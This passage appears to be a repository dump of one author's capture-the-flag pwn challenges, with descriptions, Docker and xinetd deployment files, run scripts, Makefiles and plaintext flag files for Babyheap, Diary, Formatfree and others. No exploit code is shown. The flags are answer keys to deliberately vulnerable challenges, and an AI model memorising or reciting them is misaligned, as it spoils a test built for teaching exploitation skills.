__INTERRUPT_HEADER__ 2 | #define __INTERRUPT_HEADER__ 3 | 4 | #include 5 | #include "hypervisor.h" 6 | #include "device.h" 7 | #include "hypercall.h" 8 | 9 | #define APPLET_INVOKE_INTERRUPT 0x01 10 | #define APPLET_RES_INTERRUPT 0x02 11 | 12 | void injectInterrupt(VM *vm, uint64_t interruptEntry, uint64_t kernelInterruptStackAddr); 13 | 14 | #endif 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/HYPERVISOR/util.c: -------------------------------------------------------------------------------- 1 | #include "util.h" 2 | 3 | void __attribute__((noreturn)) printError(char *msg) { 4 | puts(msg); 5 | _exit(0); 6 | } 7 | 8 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/HYPERVISOR/util.h: -------------------------------------------------------------------------------- 1 | #ifndef __UTIL_HEADER__ 2 | #define __UITL_HEADER__ 3 | 4 | #include 5 | #include 6 | 7 | void __attribute__((noreturn)) printError(char *msg); 8 | 9 | #endif 10 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/KERNEL/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | gcc -masm=intel -nostdlib -fno-builtin entry.S panic.S syscall.S interruptEntry.S elf.c hypercall.c kernel.c memory.c syscall.c applet.c -o kernel 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/KERNEL/const.h: -------------------------------------------------------------------------------- 1 | #ifndef __CONST_HEADER__ 2 | #define __CONST_HEADER__ 3 | 4 | #define SUCCESS 0 5 | #define FAIL 0xffffffffffffffff 6 | 7 | #define DIGEST_PAYLOAD_SIZE_MAX 0x2000 8 | #define DIGEST_SIZE 0x20 9 | #define SIGNATURE_SIZE 0x100 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/KERNEL/entry.S: -------------------------------------------------------------------------------- 1 | .globl _start, hlt 2 | .extern kernelMain 3 | .intel_syntax noprefix 4 | _start: 5 | call kernelMain 6 | hlt: 7 | hlt 8 | jmp hlt 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/KERNEL/interruptEntry.S: -------------------------------------------------------------------------------- 1 | .globl _interruptStart 2 | .extern kAppletInterrupt, hlt 3 | .intel_syntax noprefix 4 | _interruptStart: 5 | call kAppletInterrupt 6 | hlt 7 | jmp hlt 8 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/KERNEL/panic.S: -------------------------------------------------------------------------------- 1 | .globl panic 2 | .extern hlt 3 | .intel_syntax noprefix 4 | panic: 5 | mov eax, edi 6 | mov dx, 0x8002 7 | out dx, eax 8 | jmp hlt 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/KERNEL/panic.h: -------------------------------------------------------------------------------- 1 | #ifndef __PANIC_HEADER__ 2 | #define __PANIC_HEADER__ 3 | 4 | void __attribute__((noreturn)) panic(uint8_t *s); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/USER/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | gcc -masm=intel -nostdlib -fno-builtin entry.S user.c lib.c syscall.c -o user 4 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ASTRAL/sourcecode/StarryNight/USER/entry.S: -------------------------------------------------------------------------------- 1 | .globl _start, hlt 2 | .extern userMain 3 | .intel_syntax noprefix 4 | _start: 5 | call userMain 6 | hlt: 7 | hlt 8 | jmp hlt 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Babyheap 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Heap is easy isn't it? 9 | 10 | Estimated Difficulty : 11 | 4/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m babyheap 7 | RUN chown -R root:root /home/babyheap 8 | RUN chmod -R 755 /home/babyheap 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | babyheap: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/babyheap:ro 8 | - ./xinetd:/etc/xinetd.d/babyheap:ro 9 | ports: 10 | - "10103:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/distribute/share/babyheap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Babyheap/distribute/share/babyheap -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{EDU_h3ap_1S_e45y_c0nf1rm3d} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/babyheap/babyheap 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service babyheap 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/babyheap/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = babyheap 10 | bind = 0.0.0.0 11 | port = 10101 12 | flags = REUSE 13 | } 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babyheap/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | wget https://raw.githubusercontent.com/jwang-a/CTF/master/utils/Pwn/SECCOMP.h 3 | gcc -Wl,-z,now -fpie -fstack-protector-all babyheap.c -o babyheap 4 | strip babyheap 5 | rm SECCOMP.h 6 | 7 | clean: 8 | rm babyheap 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Babynote 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Baby notes for sell 9 | 10 | Estimated Difficulty : 11 | 2/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m Babynote 7 | RUN chown -R root:root /home/Babynote 8 | RUN chmod -R 755 /home/Babynote 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | babynote: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/Babynote:ro 8 | - ./xinetd:/etc/xinetd.d/babynote:ro 9 | ports: 10 | - "30203:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/distribute/share/babynote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Babynote/distribute/share/babynote -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{4pp4rently_bab1es_can_wr1t3_n0t3s} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Babynote/babynote 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service babynote 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Babynote/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Babynote 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Babynote/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all babynote.c -o babynote 3 | strip babynote 4 | 5 | clean: 6 | rm babynote 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Bookstore/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Bookstore 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | I've been fascinated by the Earthsea Quartet since I was a child, so I would like I opened a bookstore to share Ursula Le Guin's with y'all. Care to have a look around? 9 | 10 | Estimated Difficulty : 11 | 2/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Bookstore/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:19.04 2 | 3 | RUN apt-get update 4 | RUN apt-get dist-upgrade -y 5 | RUN apt-get install socat -y 6 | 7 | COPY libc64_2.29.so /lib/x86_64-linux-gnu/libc-2.29.so 8 | COPY ld64_2.29.so /lib64/ld-linux-x86-64.so.2 9 | 10 | RUN useradd -m bookstore 11 | COPY bookstore flag /home/bookstore/ 12 | RUN chown -R root:bookstore /home/bookstore 13 | RUN chmod -R 750 /home/bookstore/ 14 | EXPOSE 4444 15 | USER bookstore 16 | CMD socat -T30 TCP-LISTEN:4444,reuseaddr,fork EXEC:/home/bookstore/bookstore 17 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Bookstore/bookstore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Bookstore/bookstore -------------------------------------------------------------------------------- /MyChallenges/Pwn/Bookstore/flag: -------------------------------------------------------------------------------- 1 | FLAG{Ged_and_Sparrowhawk_and_The_Earthsea_Quartet} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Childnote 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Babies grow up 9 | 10 | Estimated Difficulty : 11 | 4/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m Childnote 7 | RUN chown -R root:root /home/Childnote 8 | RUN chmod -R 755 /home/Childnote 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | childnote: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/Childnote:ro 8 | - ./xinetd:/etc/xinetd.d/childnote:ro 9 | ports: 10 | - "30204:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/distribute/share/childnote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Childnote/distribute/share/childnote -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{b4by_but_b1gg3r_1n_5iz3} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Childnote/childnote 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service childnote 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Childnote/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Childnote 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Childnote/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all childnote.c -o childnote 3 | strip childnote 4 | 5 | clean: 6 | rm childnote 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Cobolstrike 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Cobol strikes back 9 | 10 | NOTE: Modified from PlaidCTF 2021 "The Cobol Job" (https://ctftime.org/task/15642). The solution is completely different, so don't worry if you haven't looked at the original challenge. Feel free to diff the source code if you find it helpful. 11 | 12 | Estimated Difficulty : 13 | 4/10 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04@sha256:f2034e7195f61334e6caff6ecf2e965f92d11e888309065da85ff50c617732b8 2 | MAINTAINER James 3 | 4 | ENV DEBIAN_FRONTEND noninteractive 5 | 6 | RUN apt-get update && apt-get install xinetd open-cobol -qy 7 | RUN useradd -m Cobolstrike 8 | 9 | CMD ["/usr/sbin/xinetd","-dontfork"] 10 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | cobolstrike: 5 | build: . 6 | volumes: 7 | - ./share:/home/Cobolstrike:ro 8 | - ./xinetd:/etc/xinetd.d/cobolstrike:ro 9 | ports: 10 | - "10101:10101" 11 | expose: 12 | - "10101" 13 | restart: always 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/share/archive/NOTE: -------------------------------------------------------------------------------- 1 | hello, brave adventurer 2 | thank you for visiting 3 | here's a quest for you 4 | please defeat the evil cobol and recover the stolen flag 5 | i'll be waiting for you at the adventurer's guild 6 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/share/cobolstrike: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Cobolstrike/distribute/share/cobolstrike -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{H3re_l13s_7he_m1ghty_Cob0l_sla1n_by_fd_0verfl0w} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | exec 2>/dev/null 4 | 5 | cd /home/Cobolstrike/archive 6 | timeout 150 /home/Cobolstrike/cobolstrike 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service cobolstrike 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Cobolstrike/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Cobolstrike 10 | groups = yes 11 | bind = 0.0.0.0 12 | port = 10101 13 | flags = REUSE 14 | } 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Cobolstrike/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | cobc -x /root/cobolstrike.cbl -o /root/cobolstrike 3 | clean: 4 | rm cobolstrike 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Diary 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | Diaries -- fun to read, painful to keep 9 | 10 | Estimated Difficulty : 11 | 7/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/Diary_writeup.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Diary/Diary_writeup.key -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m Diary 8 | RUN chown -R root:root /home/Diary 9 | RUN chmod -R 755 /home/Diary 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | diary: 5 | build: . 6 | volumes: 7 | - ./share:/home/Diary:ro 8 | - ./xinetd:/etc/xinetd.d/diary:ro 9 | ports: 10 | - "10102:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/distribute/share/diary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Diary/distribute/share/diary -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/distribute/share/flag: -------------------------------------------------------------------------------- 1 | BALSN{th3r3_c0m3s_4_t1m3_wh3n_wri73_1s_re4d_4nd_pu7s_is_g3t} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Diary/diary 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service diary 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Diary/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Diary 10 | port = 10101 11 | flags = REUSE 12 | } 13 | 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Diary/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all diary.c -o diary 3 | strip diary 4 | 5 | clean: 6 | rm diary 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | EDUshell 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | You have a shell, now what? 9 | 10 | Estimated Difficulty : 11 | 2/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | RUN apt-get update 5 | RUN apt-get install xinetd -qy 6 | RUN useradd -m EDUshell 7 | RUN chown -R root:root /home/EDUshell 8 | RUN chmod -R 755 /home/EDUshell 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | edushell: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/EDUshell:ro 8 | - ./xinetd:/etc/xinetd.d/edushell:ro 9 | ports: 10 | - "10101:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/distribute/share/EDUshell: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/EDUshell/distribute/share/EDUshell -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/distribute/share/flag: -------------------------------------------------------------------------------- 1 | FLAG{5ee_thr0ugh_th3_b1ind3d_3y3s} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/EDUshell/EDUshell 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service edushell 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/EDUshell/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = EDUshell 10 | bind = 0.0.0.0 11 | port = 10101 12 | flags = REUSE 13 | } 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/EDUshell/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | wget https://raw.githubusercontent.com/jwang-a/CTF/master/utils/Pwn/SECCOMP.h 3 | gcc -Wl,-z,now -fpie -fstack-protector-all EDUshell.c -o EDUshell 4 | strip EDUshell 5 | rm SECCOMP.h 6 | 7 | clean: 8 | rm EDUshell 9 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Elf Fortress 3 | 4 | Category : 5 | Sandbox, Pwn 6 | 7 | Desc : 8 | The elves weaved a spell to seal their fortress, and it seems that they're pretty good at their art 9 | 10 | Estimated Difficulty : 11 | 7/10 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/DISTNOTE: -------------------------------------------------------------------------------- 1 | kernel : linux-5.14.14 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:focal 2 | MAINTAINER James 3 | 4 | ENV DEBIAN_FRONTEND noninteractive 5 | 6 | RUN apt-get update 7 | RUN apt-get install xinetd qemu-system-x86 -y 8 | RUN useradd -m ElfFortress 9 | 10 | CMD ["/usr/sbin/xinetd","-dontfork"] 11 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | elffortress: 5 | build: . 6 | volumes: 7 | - ./share:/home/ElfFortress:ro 8 | - ./xinetd:/etc/xinetd.d/elffortress:ro 9 | ports: 10 | - "10101:10101" 11 | expose: 12 | - "10101" 13 | restart: always 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/share/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ElfFortress/distribute/share/bzImage -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/share/initramfs.cpio: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/ElfFortress/distribute/share/initramfs.cpio -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | exec 2>/dev/null 4 | 5 | qemu-system-x86_64 \ 6 | -m 256 \ 7 | -cpu kvm64,+smep,+smap \ 8 | -kernel /home/ElfFortress/bzImage \ 9 | -initrd /home/ElfFortress/initramfs.cpio \ 10 | -nographic \ 11 | -append "console=ttyS0 kaslr quiet" 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service elffortress 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/ElfFortress/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = ElfFortress 10 | port = 10101 11 | flags = reuse 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/ElfFortress/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -Wl,-z,now -fpie -fstack-protector-all sandbox.c -o sandbox 3 | strip sandbox 4 | 5 | clean: 6 | rm sandbox 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Formatfree 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | free of format 9 | 10 | Hint : 11 | printf is easy? think twice. 12 | 13 | Estimated Difficulty : 14 | 2/10 15 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m Formattable 8 | RUN chown -R root:root /home/Formatfree 9 | RUN chmod -R 755 /home/Formatfree 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | 2 | version: '3' 3 | 4 | services: 5 | formatfree: 6 | build: ./ 7 | volumes: 8 | - ./share:/home/Formatfree:ro 9 | - ./xinetd:/etc/xinetd.d/formatfree:ro 10 | ports: 11 | - "10102:10101" 12 | expose: 13 | - "10101" 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/distribute/share/flag: -------------------------------------------------------------------------------- 1 | flag{fr33_0f_f0rm4t_and_free_7o_fr33} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/distribute/share/formatfree: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Formatfree/distribute/share/formatfree -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Formatfree/formatfree 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service formatfree 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Formatfree/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Formatfree 10 | port = 10101 11 | flags = REUSE 12 | } 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Formatfree/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | gcc -z now -z noexecstack -fpie -fstack-protector formatfree.c -o formatfree 3 | strip formatfree 4 | 5 | clean: 6 | rm formatfree 7 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/Desc: -------------------------------------------------------------------------------- 1 | Title : 2 | Grocery Shop 3 | 4 | Category : 5 | Pwn 6 | 7 | Desc : 8 | The grocery shop's new merchandise management system 9 | 10 | Hint : 11 | My precious!!! 12 | It's priceless, but i somehow lost track of it at some point. 13 | 14 | Estimated Difficulty : 15 | 4/10 16 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/distribute/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:disco-20200114 2 | MAINTAINER James 3 | 4 | RUN sed -i -re 's/([a-z]{2}\.)?archive.ubuntu.com|security.ubuntu.com/old-releases.ubuntu.com/g' /etc/apt/sources.list && \ 5 | apt-get update && \ 6 | DEBIAN_FRONTEND=noninteractive apt-get install -qy xinetd 7 | RUN useradd -m Groceryshop 8 | RUN chown -R root:root /home/Groceryshop 9 | RUN chmod -R 755 /home/Groceryshop 10 | 11 | CMD ["/usr/sbin/xinetd","-dontfork"] 12 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/distribute/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | groceryshop: 5 | build: ./ 6 | volumes: 7 | - ./share:/home/Groceryshop:ro 8 | - ./xinetd:/etc/xinetd.d/grocery_shop:ro 9 | ports: 10 | - "10103:10101" 11 | expose: 12 | - "10101" 13 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/distribute/share/flag: -------------------------------------------------------------------------------- 1 | flag{Br0k3n_7ran51t1v3_l4w_g3ts_me_3v3rytime} 2 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/distribute/share/grocery_shop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jwang-a/CTF/978897eea15e1eafb053ed7a524e1812263eef7e/MyChallenges/Pwn/Grocery_Shop/distribute/share/grocery_shop -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/distribute/share/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | exec 2>/dev/null 4 | timeout 60 /home/Groceryshop/grocery_shop 5 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/distribute/xinetd: -------------------------------------------------------------------------------- 1 | service grocery_shop 2 | { 3 | disable = no 4 | type = UNLISTED 5 | wait = no 6 | server = /home/Groceryshop/run.sh 7 | socket_type = stream 8 | protocol = tcp 9 | user = Groceryshop 10 | port = 10101 11 | flags = REUSE 12 | } 13 | 14 | -------------------------------------------------------------------------------- /MyChallenges/Pwn/Grocery_Shop/sourcecode/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | wget 